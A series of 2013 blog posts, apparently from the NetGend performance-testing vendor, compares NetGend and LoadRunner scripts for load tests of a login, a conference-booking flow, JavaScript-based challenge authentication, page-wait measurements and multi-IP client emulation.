action(ftp, op, "bye");

action(ftp, op, "pwd");

FTP lost to HTTP because ftp is simpler than HTTP - it doesn't have the fancy extensions of HTTP. So let's keep performance testing on FTP simple too.

Saturday, November 30, 2013

Javascript processing in Performance testing

Thanks to a tweet from Stuart, a guru on performance testing, I checked out the blog by HP loadrunner that shows how to do authentication with client side javascript evalution. One key point in the blog is an interesting Loadrunner function called "web_js_run". This function can be used to evaluate a javascript code snippet. In this blog, we are going to show that our NetGend platform also supports javascript evaluation, only easier.

To paraphrase the test scenario (with a slight change) , a client needs to do the following 3 steps

sends a request to an authentication server to get the challenge string, the server response is in the format of JSON
Extracts the last element (the real challenge string) from the JSON string and concatenates it with a local passcode and do the encryption.
sends the encrypted string to the server to get a token (assume authentication is successful).

Part of input are two javascript files, crypto.js and calcPassword.js that are used by a browser to do the job.

  /////file crypto.js
  function encrypt(data) {   
    return data.toString().split("").reverse().join("");   
  }   
  //simplified encryption to illustrate the point of evaluating javascript on client side

 // file calcPassword.js  
 function extractJson(stringData) {
   var data = JSON.parse(stringData);    
   var index = data[data.length - 1];    
   return data[index]; 
 }
 function getPassword(stringData){    
   return encrypt(extractJson(value));    
 }

Here is the NetGend script. Note that we have two functions related to Javascript evaluation:

evalJS(..) can evaluate a javascript, either from a file (specified by its file name) or just a string of javascript code snippet (default case).
JE(..) will evaluate a javascript function, first parameter is the javascript function name.

 function userInit() {  
    evalJS("crypto.js", "file"); 
    evalJS("calcPassword.js", "file"); 
    //now javascript engine will understand functions "encrypt"  "extractJson"
 }  
 function VUSER() {  
    action(http,"http://localhost:3000/challenge");  
    challenge = je(extractJson, http.replyBody);
    localPasscode = "abc123"; //can also read from a csv file
    password = je(encrypt, "${challenge}${localPasscode}");  
    password = toUrl(password); //encoding password to URL  
    action(http, "http://localhost:3000/token?password=${password}");  
    token = http.replyBody;
 }

As a contrast, here is the original loadrunner script in the blog. Note that the script would have been much longer if it has to do the concatenation without javascript.

 Action()  
 {  
      web_reg_save_param("challenge","LB=","RB=","Search=Body",LAST);  
      web_custom_request("challenge",   
           "URL=http://localhost:3000/challenge",   
           "Method=GET",   
           "RecContentType=application/json",   
           "Snapshot=t1.inf",   
           LAST);  
      web_js_run(  
           "Code=getPassword(LR.getParam('challenge'));",  
           "ResultParam=password",  
           SOURCES,  
           "File=crypto.js", ENDITEM,  
           "File=calcPassword.js", ENDITEM,  
           LAST);  
      web_js_run(  
           "Code='http:/'+'/localhost:3000/token?password=' + encodeURI(LR.getParam('password'));",  
           "ResultParam=uri",  
           LAST);  
      web_custom_request("get token",   
           "URL={uri}",   
           "Method=GET",   
           "RecContentType=application/json"  
           LAST);  
      return 0;  
 }

Being able to support javascript in performance testing is important, does your favorite test platform support it? Is it easy?

Thursday, November 28, 2013

Loadrunner script vs NetGend javascript script: a more complete comparison

After a few blogs with code snippet showing the differences between Loadrunner syntax and NetGend javascript syntax, I got an excellent request: "can you compare a full Loadrunner script with a full NetGend javascript"?

I like this idea because it not only gives a better idea on how the NetGend javascript works in more detail, it also shows the possibility of translating a loadrunner script into (much simpler) NetGend script.

The loadrunner script is based on a real one from production test, it emulates VUsers performing the following actions: 1) login to a conference web site, 2) set up a conference, 3) update the conference 4) cancel the conference and logout.

To save the size of this blog, I combined the vuser_init, vuser_end and action parts together and trimmed the number resources for transactions. By comparing it with NetGend script, you can see

Assigning to a parameter like "URL" is much simpler with NetGend Script
NetGend functions

function names are shorter and easier to remember
function parameters are shorter too, they are easier to understand.

Variable substitution is very close between the two scripts

with Loadrunner, you do it with {VARNAME}
with NetGend, you do it with ${VARNAME}
One subtle but important differenence on variable substitution

In NetGend, it happens in all strings (including all string parameters of functions),
In Loadrunner, only certain parameters of certain function are capable of doing substitution.

On NetGend platform, when there are many resources to download, it will spawn many sessions to retrieve the resources at the same time.

Here come the scripts, first one is for loadrunner, the second one is for NetGend. They are a little long.

 Action()   //Loadrunner script
 {  
      char Url[20];  
      sprintf(Url ,"conference.example.com");  
      lr_save_string (Url,"URL");  
      web_url("Login_conference.example",   
           "URL=http://{URL}/",   
           "Resource=0",   
           "RecContentType=text/html",   
           "Referer=",   
           "Snapshot=t1.inf",   
           "Mode=HTML",   
           EXTRARES,   
           "Url=/images/bg_content04.gif", "Referer=http://{URL}/loginAction!getCookie.action", ENDITEM,   
           "Url=/images/bg_loginLeft_bg01.gif", "Referer=http://{URL}/loginAction!getCookie.action", ENDITEM,   
           LAST);  
      //lr_think_time(21);  
   web_submit_form("loginAction!login.action_2",   
           "Snapshot=t3.inf",   
           ITEMDATA,   
           "Name=password", "Value={Password}", ENDITEM,   
           "Name=vercode", "Value=", ENDITEM,   
           "Name=qsbycookie", "Value=<OFF>", ENDITEM,   
           EXTRARES,   
           "Url=/images/bg_welcome01.gif", "Referer=http://{URL}/mainAction.action", ENDITEM,   
           "Url=/images/bg_contentHome01.jpg", "Referer=http://{URL}/mainAction.action", ENDITEM,   
           LAST);  
   //lr_think_time(8);  
      web_url("conf2_readyForCreate.action",   
           "URL=http://{URL}/reserve/conf2_readyForCreate.action",   
           "Resource=0",   
           "RecContentType=text/html",   
           "Referer=",   
           "Snapshot=t7.inf",   
           "Mode=HTML",   
           EXTRARES,   
           "Url=../css/jquery.datepick.css", ENDITEM,   
           "Url=../images/bg_button07.gif", ENDITEM,   
           LAST);  
      lr_start_transaction("reserve");  
      web_submit_data("conf2_reserve.action",   
           "Action=http://{URL}/reserve/conf2_reserve.action",   
           "Method=POST",   
           "RecContentType=text/html",   
           "Referer=http://{URL}/reserve/conf2_readyForCreate.action",   
           "Snapshot=t11.inf",   
           "Mode=HTML",   
           ITEMDATA,   
           "Name=rv.conferenceId_by", "Value=", ENDITEM,   
           "Name=rv.confStatus", "Value=0", ENDITEM,   
           "Name=rv.confName", "Value=test_per_update", ENDITEM,   
           "Name=rv.dateStart", "Value={Date}", ENDITEM,   
           EXTRARES,   
           "Url=../images/bg_H02.gif", ENDITEM,   
           LAST);  
      lr_end_transaction("reserve");

      web_reg_save_param ("conferenceid","LB=<a href=\"/reserve/confView.action?conferenceid="",
                              RB="\" reserve="">",
         LAST);
 web_url("conf2_list.action", 
  "URL=http://{URL}/reserve/conf2_list.action", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/mainAction.action", 
  "Snapshot=t6.inf", 
  "Mode=HTML", 
  EXTRARES, 
  "Url=../images/bg_content01.gif", ENDITEM, 
  "Url=../images/bg_content02.gif", ENDITEM, 
  LAST);


 web_url("conf2_readyForUpdate.action", 
  "URL=http://{URL}/reserve/conf2_readyForUpdate.action?conferenceid={conferenceid}", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_list.action", 
  "Snapshot=t14.inf", 
  "Mode=HTML", 
  LAST);

 lr_think_time (30);

 lr_rendezvous("update");

 lr_start_transaction("update");

    web_submit_data("conf2_update.action", 
  "Action=http://{URL}/reserve/conf2_update.action", 
  "Method=POST", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_readyForUpdate.action?conferenceid={conferenceid}", 
  "Snapshot=t18.inf", 
  "Mode=HTML", 
  ITEMDATA, 
  "Name=rv.conferenceId_by", "Value={conferenceid}", ENDITEM, 
  "Name=rv.confStatus", "Value=0", ENDITEM, 
  "Name=rv.contactphone", "Value=", ENDITEM, 
  "Name=rv.confName", "Value=test_per_update{NameNumber}", ENDITEM, 
  "Name=rv.dateStart", "Value=2013-11-28", ENDITEM, 
  LAST);

 lr_end_transaction("update", LR_AUTO);
        
 lr_start_transaction("Cancel");

 web_submit_data("conf2_cancel.action", 
  "Action=http://conference.example.com/reserve/conf2_cancel.action", 
  "Method=POST", 
  "RecContentType=text/html", 
  "Referer=http://conference.example.com/reserve/conf2_list.action", 
  "Snapshot=t6.inf", 
  "Mode=HTML", 
  ITEMDATA, 
  "Name=conferenceid", "Value={conferenceid}", ENDITEM, 
  LAST);

 lr_end_transaction("Cancel", LR_AUTO);   
 web_url("logoutAction.action", 
  "URL=http://{URL}/logoutAction.action", 
  "Resource=0", 
  "RecContentType=text/html", 
  "Referer=http://{URL}/reserve/conf2_list.action", 
  "Snapshot=t21.inf", 
  "Mode=HTML", 
  LAST);  
      return 0;  
 }

Here is the equivalent script in NetGend Javascript.

 function VUSER() {  //NetGend Javascript
      URL = "conference.example.com";  
      action(http, URL); 
      httpHeader.Refer = "http://${URL}/loginAction!getCookie.action"; 
      spawn( ["/images/bg_content04.gif","/images/bg_loginLeft_bg01.gif"]);  

      //sleep(21);  
      http.POSTData = "password=${Password}&vercode=&qsbycookie=<OFF>";  
      action(http, URL);  
      httpHeader.Referer = "http://${URL}/mainAction.action";  
      spawn( ["/images/bg_welcome01.gif","/images/bg_contentHome01.jpg"]);  

      //sleep(8);  
      action(http,"http://${URL}/reserve/conf2_readyForCreate.action");       
      spawn(["../css/jquery.datepick.css", "../images/bg_button07.gif"]);  

      b."rv.conferenceId_by" = "";  
      b."rv.confStatus" = 0;  
      b."rv.confName" = "test_per_update";  
      b."rv.dateStart" = currentTime();  
      http.POSTData = combineHttpParam(b);  
      httpHeader.Referer = "http://${URL}/reserve/conf2_readyForCreate.action";  
      action(http, "http://${URL}/reserve/conf2_reserve.action");  
      spawn(["../images/bg_H02.gif"]);  

      conferenceid = substring(http.replyBody, "<a href=\"/reserve/confView.action?conferenceid=", "\" >");  
      httpHeader.Refer = "http://${URL}/mainAction.action";
      action(http,"http://${URL}/reserve/conf2_list.action");  
      spawn(["../images/bg_content01.gif", "../images/bg_content02.gif"]);  

      httpHeader.Referer = "http://${URL}/reserve/conf2_list.action";  
      action(http, "http://${URL}/reserve/conf2_readyForUpdate.action?conferenceid=${conferenceid}");  

      sleep(30);
      rendv("update", 40); //gather 40 VUsers here before moving on to next step  

      httHeader.Referer = "http://${URL}/reserve/conf2_readyForUpdate.action?conferenceid=${conferenceid}",   
      c."rv.conferenceId_by" = conferenceid;  
      c."rv.confStatus"   = 0;  
      c."rv.contactphone"  = "";  
      c."rv.confName"    = "test_per_update${vuserId}";  
      c."rv.dateStart"    = "2013-11-28";  
      action(http, "http://${URL}/reserve/conf2_update.action");  

      httpHeader.Referer = "http://conference.example.com/reserve/conf2_list.action";  
      http.POSTData = "conferenceid=${conferenceid}";  
      action(http, "http://conference.example.com/reserve/conf2_cancel.action");  

      httpHeader.Referer = "http://${URL}/reserve/conf2_list.action";  
      action(http, "http://${URL}/logoutAction.action");  
 }

Tuesday, November 26, 2013

Know yourself when choosing the right web hosting

There are a lot of web hosting companies out there, many claim to have some sort of accelerators that can significantly speed up your web pages. While some claims are true, it's better to put them to test.

Recently I looked at a web hosting company, found one of its customers by going to "testimonials" section and picked a "happy" customer. When I opened this customer's site in my browser, I am surprised that it was not that snappy (despite the good words from the "happy" customer).

To get a better measurement, I opened Chrome's developer console and clicked a new link. The network tab in developer tool showed that the main HTML page itself (not including the resources like css, js, images ...) spent more than 2 seconds just in the "waiting" period. To those who are not familiar with this term, "waiting" period is the time between transmission of the HTTP request and arrival of first byte of HTTP response comes. Interestingly, if I refresh the page, the waiting time is only a little more than 100ms. The most likely reason is that data is cold in the database (not in the cache).

What if I refresh the page multiple times and what would the waiting times be? Since it's tedious to do it manually, I used a simple script (using netgend javascript syntax) to do the measurement. Here the URL is changed to keep the web hosting company anonymous.

 function VUSER() {  
      i = 0;  
      while (i < 10) {  
           action(http, "http://www.example.com/somepage");  
           printf("%.2f\n", http.initialRespTime);  
           i ++;  
      }  
 }

It produced the following data (in ms):

From this we can observe that:

After the first 2 attempts, the server is fairly responsive. ~80ms is quite fast considering the network latency itself is about 40ms.
Occasionally the latency goes a little higher (like the 231ms in the above) but still acceptable, could be because server is busy handling other requests.

We knew the (most likely) reason why the first waiting time is long, but why was the second waiting time is high too? I couldn't think of a reason. Even looked at packet capture when I ran the test and it confirmed the timing reported by test tool. I can only guess that it's introduced by the acceleration engine of the web hosting infrastructure.

Based on the numbers, we could see that the accelerator may be working, but does it help if you are a site owner? It depends:

If your web site is lightly visited, your visitor may have a not-so-great experience (every page that he clicks will be cold in database). The benefit of the accelerator may be questionable.
If your site is heavily visited, majority of the visitors will feel your site is snappy!

In summary, you, as a site owner, need to know your site before choosing the "right" web hosting service.

Monday, November 25, 2013

Performance testing with different IP addresses

Recently I saw a web hosting company which has a creative approach on charging: by page views on a given day, defined as the number of visitors to the web site with unique IP addresses. This is interesting in that it protects the site owner from being charged when a hacker uses a tool and generates lots of "hits" to the web site. Being able to emulate different IP addresses in testing such an infrastructure will definitely be helpful.

We mentioned in earlier blogs that that a Netgend performance test platform can emulate 50,000 VUsers. In fact, it can maintain 50,000 concurrent TCP sessions. So, can all the VUsers have unique IP addresses? The answer is yes.

To do this, we just need to specify the following parameters:

Ranges of IP addresses
virtual IP
gateway IP.
route to server

As an example, suppose

You connect the test platform to an interface of a router, the router's interface IP address is 192.168.5.1,
You want to emulate IP addresses in two ranges: 11.1.1.1-11.1.1.100, 12.23.1.5-12.23.1.200,
The target servers have IP addresses in 10.10.10.0/24

Your configuration can be the following:

 range: 11.1.1.1-11.1.1.100, 12.23.1.5-12.23.1.200  
 virtual router IP: 192.168.5.11  
 gateway IP: 192.168.5.1  
 route to Servers: 10.10.10.0/24

Note that the "virtual router IP" above can be considered as a "gateway" to IP addresses in the ranges (client IP addresses). The physical router will need it to set up route to reach the client IP addresses.

On many OS, one can assign multiple IP addresses to an interface. But it is not scalable in terms of the time consumed in configuration and the number of IP addresses allowed. One can also try user-space TCP/IP stack, but it may miss many features of a standard TCP/IP stack on windows, Linux or Mac. On the netgend platform we use an innovative method to "enable" an OS to have many different IP addresses You can ping them to verify.

Other than testing the above infrastructure, another benefit of using unique IP addresses in performance test is on trouble-shooting. Suppose you have network sniffer (like Wireshark) that captures all the packets during testing, it will be a nightmare if all the sessions are from the same IP addresses. With different IP addresses for clients, it will be much easier to keep track of any of the clients - you can extract all the packets related to a client and study them.

With social media gaining momentum, I am sure there will be more examples of server infrastructure that can make good use of the IP addresses from clients. Can your favorite performance testing platform support it?

Thursday, November 21, 2013

Story of a ghetto coder

Believe or not, I was called a ghetto coder when I was doing testing automation. The story was like this, a software feature was implemented, but missed an important feature: "Save As". So users of the system can't save his/her configurations. I wrote a tool that extracts relevant part of user configuration on that feature from the system configuration (a big xml blob) and save it to a file and be able restore the configuration from a file. This workaround served the purpose of "Save As". I was happy and expected some compliments, but was surprised that one "compliment" was "ghetto coder". Why? I did the extraction(from a big xml string) by regular expression :-( Later on, I changed the tool to use tdom package - the official and better way on extraction from xml string, but the nick name remained. I was actually happy at the outcome since many colleagues got to know this nickname. Whenever they needed some tools urgently, they came to this "ghetto coder" and they usually got something working shortly after. I guess the word "ghetto" has turned into "quick and dirty" and it can be helpful in some cases.

It reminded me of the story when I saw someone asked a question on performance testing: Given a server response like the following,

{
   "id" : {
    "idUri" : [ "/id/123123" ]
   }
}

how to extract the field "/id/123123"? The answer was given using regular expression:

"idUri" : \[ "([^"]+?)" \]

While the regular expression works for this particular string, I was worried that if the spacing changes a little bit (like some white space was removed or added, a new line was inserted after "["), this regular expression may fail.

With Netgend javascript, it's fairly easy to extract it

 a = fromJson(str);  
 //now variable a.id.idUri[0] contains the desired field

Here the structure of the variable a.id.idUri[0] follows the hierarchy of the json message, so it's fairly easy to understand. Note that in particular, the array ("idUri" in this case) is 0 based, so idUri[0] means the first element.
This will work no matter how the spacing changes. Should there be a second element in the "idUri" array, it can extract that element too (just use a.id.idUri[1] instead) . On top of all these, this is much easier for someone with basic programming skills than the complex regular expression.

My experience as "ghetto" coder taught me that it's ok to write "ghetto" code, but you or the users need to be aware of the possible conditions that can cause it to break. Also, if there is an easy way to do the task in a better way (like using tdom package to extract part of xml string), jump on it.